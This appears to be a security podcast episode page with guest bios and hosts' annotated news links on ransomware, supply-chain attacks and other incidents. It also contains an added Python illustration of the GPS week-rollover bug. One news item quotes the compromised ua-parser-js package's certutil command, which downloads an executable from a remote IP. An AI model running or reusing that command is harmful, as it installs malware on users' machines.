Paul’s Security Weekly Episode #716 – October 27, 2021

Subscribe to all of our shows and mailing list by visiting: https://securityweekly.com/subscribe

1. Focusing on Preventing Ransomware – 06:00 PM-06:45 PM

Announcements

  • Security Weekly Unlocked will be held IN PERSON this December 5-7 at the Hilton Lake Buena Vista! Keynotes from Alyssa Miller, John Strand, Lesley Carhart, & Dave Kennedy! Visit https://securityweekly.com/unlocked to register for free and check out our rockstar lineup!

Description

A good backup is not prevention. It's recovery. Roger A. Grimes, author of the just-released Ransomware Protection Playbook (Wiley) and of 12 other books and over 1100 articles on computer security, is going to discuss how sophisticated ransomware is today, how it usually breaks in, what it does, and what every person and organization should be doing to stop it. Hint: it doesn't involve firewalls, antivirus software, or any other super special software supposedly designed to stop every attack. Come get the straight dope on what you and your company should be doing to prevent ransomware from getting a foothold in your environment…from the guy who wrote the book on it.

Guest(s)

Roger Grimes

Roger Grimes – Data-Driven Defense Evangelist at KnowBe4

@rogeragrimes

34-year computer security veteran, author of 13 books and over 1100 articles on computer security.

Hosts

Jeff Man

@MrJeffMan

#HackingisNotaCrime Advocate, Sr. InfoSec Consultant at Online Business Systems

Josh Marpet

@quadling

Executive Director at RM-ISAO

Larry Pesce

@haxorthematrix

Principal Managing Consultant and Director of Research & Development at InGuardians

Lee Neely

@lelandneely

Senior Cyber Analyst at Lawrence Livermore National Laboratory

Paul Asadoorian

@securityweekly

Founder at Security Weekly

Tyler Robinson

@tyler_robinson

Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element

2. What Exactly Is an Incident Commander, Anyway – 07:00 PM-07:45 PM

Announcements

  • InfoSec World 2021 is proud to announce its keynote lineup for this year’s event! Hear from Robert Herjavec plus heads of security at the NFL, TikTok, U.S. Department of Homeland Security, Stanford University, and more… Plus, Security Weekly listeners save 20% on Digital Pass registration! Visit https://securityweekly.com/isw2021 to register now!

Description

You may have seen the term “Incident Commander” in discussions about incident response, but do you know where that term came from and what it means? How can professionalizing your incident response using proven disaster management methodology up your game? Matt Linton is an experienced Emergency Responder and USA Region lead of Google’s Security Response team. For the past decade he’s been working on bringing the lessons learned from physical disaster management into the digital forensics and incident response realm.

Guest(s)

Matt Linton

Matt Linton – Chaos Specialist at Google

@0xMatt

Matt cut his technical teeth in the MUDs and IRC dens of the 90s while daylighting in search and rescue. His longtime white hat security hobby and years of work experience in high-pressure environments converged in a career change to UNIX system administration. While working for a government research lab, his diverse background readily lent itself to new work assignments in both blue team security operations and red team penetration testing. Today he leads security incident management at Google, where he strives to infuse security functions with the best practices of disaster management, and where he explores the limits of speed, quality, and affordability in the fields of digital forensics and incident response.

3. Iranian Gas, Smelly Towns, View Source Legality, EBCDIC & GDPR, & Unlocking Oculus Go – 08:00 PM-09:30 PM

Announcements

  • Join us for our next live webcast on November 4th to learn about Pragmatic Steps to Reduce Your Software Supply Chain Risk. Then join us November 11th to learn the key insights and takeaways from the 2021 OWASP Top Ten. Visit https://securityweekly.com/webcasts to save your seat! Don't forget to check out our library of on-demand webcasts & technical trainings at https://securityweekly.com/ondemand

Description

This week in the Security News we talk: It's still not illegal to look at HTML source code, Nobelium strikes again, npm infections, gas is cheap in Iran, if you can get it, Google Tensor, going beyond the transport layer with HTTPS, buying a power plant, EBCDIC and GDPR, how children can infect parents, signing your rootkit, dates are hard, something smells funny and bird poop in your antenna, & more!

Hosts

Jeff Man

@MrJeffMan

#HackingisNotaCrime Advocate, Sr. InfoSec Consultant at Online Business Systems

  1. POS Device Maker Pax Draws Scrutiny Following Allegations of ‘Strange Network Activity’

Josh Marpet

@quadling

Executive Director at RM-ISAO

Larry Pesce

@haxorthematrix

Principal Managing Consultant and Director of Research & Development at InGuardians

  1. Add Mycelium To Your Mesh Networks
  2. FBI Releases Indicators of Compromise Associated with Ranzy Locker Ransomware
  3. Cracking WiFi at Scale with One Simple Trick
  4. Unlocking Oculus Go
  5. Copyleft Compliance Projects – Software Freedom Conservancy
  6. SS7 Attack Panel: Yet Another Rising SCAM on Social Media
  7. California town? This could be the studio… – SQUIRREL! I love this industry… it is the only one I know of where you can mention snort, vomit and burp and not be talking about a bodily function.

Lee Neely

@lelandneely

Senior Cyber Analyst at Lawrence Livermore National Laboratory

  1. Viewing website HTML code is not illegal or “hacking,” prof. tells Missouri gov. – The cybersecurity professor who helped uncover the Missouri government’s failure to protect teachers’ Social Security numbers has demanded that the state cease its investigation into him and stop making “baseless accusations” that he committed a crime.

    Khan hired an attorney to defend himself against the state’s accusations. On Thursday last week, Khan’s attorney sent a litigation hold and demand letter to Parson and several state agencies. The letter says that Parson and other state officials defamed Khan and violated his First Amendment “right to speak freely without the threat of government retaliation.” The letter adds the Show Me State’s investigation into Khan “would violate the prohibition on malicious prosecution.”

    “Professor Khan is likely to prevail on the merits of any case brought against him,” the letter said. “No statute in Missouri or on the federal level prohibits members of the general public from viewing publicly available websites or viewing the website’s unencrypted source code. No reasonable person would think they were unauthorized to view a publicly available website, its unencrypted source code, or any of the unencrypted translations of that source code. There is no probable cause to investigate Professor Khan, and instigation or continuation of any proceeding against him would therefore be prohibited.”

  2. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns – Microsoft has issued a warning to organizations that the “Nobelium” hacking group behind the SolarWinds attacks has targeted some 140 technology service providers and resellers as part of a global IT supply chain attack.
  3. Another popular npm package infected with malware – In an audacious incident, threat actors hijacked the account of the developer of a widely used JavaScript library, UAParser.js, to replace the legitimate code with malicious code infused with malware and trojans.
  4. TodayZoo phishing kit borrows the code from other kits – Researchers say they have discovered a series of credential phishing campaigns in which hackers are leveraging a phishing kit dubbed “TodayZoo” that uses large portions of code lifted from various other phishing kits in order to steal credentials. According to Microsoft, TodayZoo was first identified in December 2020 and includes portions of code such as comment markers, dead links, and other elements found in other, previous phishing kits.
  5. Groove ransomware calls on all extortion gangs to attack US interests – The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil’s infrastructure last week.

    Over the weekend, BleepingComputer reported that the REvil ransomware operation shut down again after an unknown third party hijacked their dark web domains.

  6. Iran says cyberattack closes gas stations across country – A cyberattack crippled gas stations across Iran on Tuesday, leaving angry motorists stranded in long lines.

    No group immediately claimed responsibility for the attack, which rendered useless the government-issued electronic cards that many Iranians use to buy subsidized fuel at the pump.

  7. Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware – An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular BillQuick Web Suite time and billing solution to deploy ransomware.

Paul Asadoorian

@securityweekly

Founder at Security Weekly

  1. FBI Raids Chinese Point-of-Sale Giant PAX Technology – Krebs on Security
  2. Apple Patches Critical iOS Bugs; One Might Be Under Attack
  3. Squirrel Bug Lets Attackers Execute Code in Games, Cloud Services
  4. How hackers hijacked thousands of high-profile YouTube accounts
  5. SALAD SHOOTER: June 1963: Discovery of the Cosmic Microwave Background – “Take the case of Bell Labs physicists Arno Penzias and Robert Wilson, who set out to map radio signals from the Milky Way and wound up being the first to measure the cosmic background radiation (CMB). Their momentous discovery made it possible to obtain information about cosmic processes that took place about 14 billion years ago, and forever changed the science of cosmology, transforming it from a specialty of a select few astronomers to a “respectable” branch of physics almost overnight.” All stemmed from me watching this video, as part of my son's homework! https://www.youtube.com/watch?v=hcds5Ob59Dg – Also interesting is that they started to look into interference for some of the first satellite phones. They cleaned bird poop out of the antenna as a potential source of interference. 1% of the static on your TV with an antenna, if you tune in between the channels, comes from residual big bang microwave radiation.
  6. 70% of WiFi Network Samples Cracked in a WiFi Network Cracking Experiment
  7. Pixel 6: Setting a new standard for mobile security – I can't wait: “The Google Tensor security core is a custom designed security subsystem dedicated to the preservation of user privacy. It's distinct from the application processor, not only logically, but physically, and consists of a dedicated CPU, ROM, one-time-programmable (OTP) memory, crypto engine, internal SRAM, and protected DRAM. For Pixel 6 and 6 Pro, the security core's primary use cases include protecting user data keys at runtime, hardening secure boot, and interfacing with Titan M2™.”
  8. Why I think all budding ethical hackers should take CS50x or learn some bit of Computer Science.
  9. HTTPS Attestable (HTTPA) Protocol – Enhancing HTTPS Security – I really think of HTTPS as protecting the transport layer, however, Intel is proposing extending it as: “HTTPS cannot provide security assurances on the request data in compute, so the computing environment remains uncertain risks and vulnerabilities.”
  10. Malicious Firefox Add-ons Block Browser From Downloading Security Updates – We need some further restrictions on what add-ons can do: “The two extensions in question, named Bypass and Bypass XM, ‘interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content.’”
  11. SolarWinds hackers, Nobelium, once again strike global IT supply chains, Microsoft warns
  12. North Korea Linked Lazarus APT Now Targets the IT supply chain. – CyberWorkx
  13. Iranian gas stations out of service after distribution network hacked – First, like wow: “According to media reports, the “cyberattack 64411” message appeared to customers that tried to get subsidized fuel at 5 cents a liter or 20 cents a gallon using government-issued cards.” Also, a coordinated attack: “As news spread about the NIOPDC distribution network being under attack, digital billboards in multiple cities in Iran started to show messages reading “Khamenei! Where's our fuel?” and “Free fuel in Jamaran station.”” and this LOL: “Iranian state television confirmed the reports of a cyberattack hitting gas stations and Iran's Supreme Council of Cyberspace believes the incident is state-sponsored, although it is early to say which country is behind it.” – Gee I wonder who?
  14. Azure AD Default Configuration Blunders
  15. Bitcoin-mining power plant raises ire of environmentalists – “Greenidge Generation runs a once-mothballed plant near the shore of Seneca Lake in the Finger Lakes region to produce about 44 megawatts to run 15,300 computer servers, plus additional electricity it sends into the state’s power grid. The megawatts dedicated to Bitcoin might be enough electricity to power more than 35,000 homes.”
  16. EBCDIC is incompatible with GDPR – So, the bank could not spell a customer’s name correctly, due to diacritical marks. The customer filed a GDPR complaint under Article 16 (“The data subject shall have the right to obtain from the controller without undue delay the rectification of inaccurate personal data concerning him or her.”). The bank says this is impossible because, get this, the system they use only supports EBCDIC!
  17. PHP-FPM local root vulnerability – This, THIS is why I hate parent processes running as root and child processes running with lower privileges: “A low-privilege process can read and write an array of pointers used by the main process, running as root, through shared memory. An attacker can leverage this problem to change a 32-bit integer from zero to one in the main process’s memory, or clear a memory region. By leveraging the primitive multiple times, it is possible to reach another bug, make the main process execute code, and thus escalate privileges.”
  18. Breaking the News: New York Times Journalist Ben Hubbard Hacked with Pegasus after Reporting on Previous Hacking Attempts – The Citizen Lab
  19. Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) – Questions about deprecated npm package ua-parser-js · Issue #536 · faisalman/ua-parser-js – Yikes: “certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe”
  20. Digitally-Signed Rootkits are Back – A Look at FiveSys and Companions – I really want to know how this works: “For the past few months, Bitdefender researchers have seen a surge in malicious drivers with valid digital signatures issued through the WHQL signing process. This research focuses on FiveSys – a digitally signed rootkit that made its way through the driver certification process.” – The whitepaper does not really say, unless I missed it, how the attackers managed this: “The reason for this might be the new Driver Signing requirements from Microsoft, which demand drivers to be digitally signed by Microsoft before acceptance by the operating system. This new requirement ensures that all drivers are validated and signed by the operating system vendor rather than the original developer and, as such, digital signatures offer no indication as to the identity of the real developer. It seems that malware writers managed to work around the new requirements, as Netfilter and new FiveSys demonstrated.”
  21. CISA warns of GPS bug that may roll back dates by 1,024 weeks, to March 2002 – Coding dates and time is hard: https://gitlab.com/gpsd/gpsd/-/issues/144 – Looks like in accounting for leap year they created a time machine: “trigger a 1024 week backward time jump from Saturday October 16, 2021 to Sunday March 3, 2002”.
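An added illustration of the 1024-week jump behind the gpsd story above. This is example code written for these notes, not gpsd's code or anything from the CISA advisory: it models the generic 10-bit GPS week counter from the legacy navigation message, a reference-date resolver of the kind receivers and libraries use to pick the right 1024-week era, and the plausibility check a consumer of GPS time should apply so that a rolled-back date is rejected instead of trusted. The reference dates (2021-01-01 as a "current" build date, 2000-01-01 as a stale one) are constructed for the demo; the resolver is a textbook version, not gpsd's specific code path.

```python
from datetime import date, timedelta

# Constructed example for these show notes, not gpsd's code: the legacy GPS
# navigation message carries only a 10-bit week number, so receivers must
# guess which 1024-week "era" they are in, usually from a reference date.
GPS_EPOCH = date(1980, 1, 6)     # GPS week 0, day 0 (a Sunday)
WEEK_ROLLOVER = 1024             # 2**10: the transmitted week number wraps here


def gps_week(d: date) -> int:
    """Full, unambiguous GPS week number for a calendar date."""
    return (d - GPS_EPOCH).days // 7


def transmitted_week(d: date) -> int:
    """The 10-bit week number a receiver actually sees for that date."""
    return gps_week(d) % WEEK_ROLLOVER


def resolve_week(week10: int, reference: date) -> int:
    """Turn a 10-bit week number into a full week number by assuming the true
    date lies in the 1024-week window starting at `reference` (for example the
    firmware or software build date). Any true date outside that window
    resolves to the wrong era, which is the classic 1024-week time jump."""
    ref_week = gps_week(reference)
    era_start = ref_week - ref_week % WEEK_ROLLOVER
    full = era_start + week10
    if full < ref_week:          # counter already wrapped since the reference
        full += WEEK_ROLLOVER
    return full


def week_to_date(week: int, day_of_week: int = 0) -> date:
    """Sunday (day 0) of a full GPS week, plus an optional day offset."""
    return GPS_EPOCH + timedelta(weeks=week, days=day_of_week)


def is_plausible(resolved: date, trusted_floor: date) -> bool:
    """Defensive check for anything that consumes GPS time: reject a resolved
    date earlier than a date known to be in the past already (last known good
    time, build time, or an independent clock such as NTP). A 1024-week
    rollback always fails this test."""
    return resolved >= trusted_floor


def demo() -> tuple:
    """Resolve one Saturday in 2021 twice: once with a current reference date
    and once with a stale one. Returns (correct_date, rolled_back_date)."""
    true_date = date(2021, 10, 16)
    week10 = transmitted_week(true_date)          # what comes off the air
    dow = (true_date - GPS_EPOCH).days % 7        # day within the GPS week
    good = week_to_date(resolve_week(week10, date(2021, 1, 1)), dow)
    stale = week_to_date(resolve_week(week10, date(2000, 1, 1)), dow)
    return good, stale


if __name__ == "__main__":
    good, stale = demo()
    floor = date(2021, 1, 1)
    print("correct :", good, "plausible:", is_plausible(good, floor))
    print("rollback:", stale, "plausible:", is_plausible(stale, floor))
    print("jump    :", (good - stale).days // 7, "weeks")
```

With the stale reference the same over-the-air week number lands exactly 1024 weeks earlier, in March 2002, which is why a floor derived from a trusted clock (rather than from the same GPS data) is the cheap check that catches this class of bug before it propagates into timestamps, certificates and logs.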

Tyler Robinson

@tyler_robinson

Director of Offensive Security & Research at Trimarc Security, Founder & CEO at Dark Element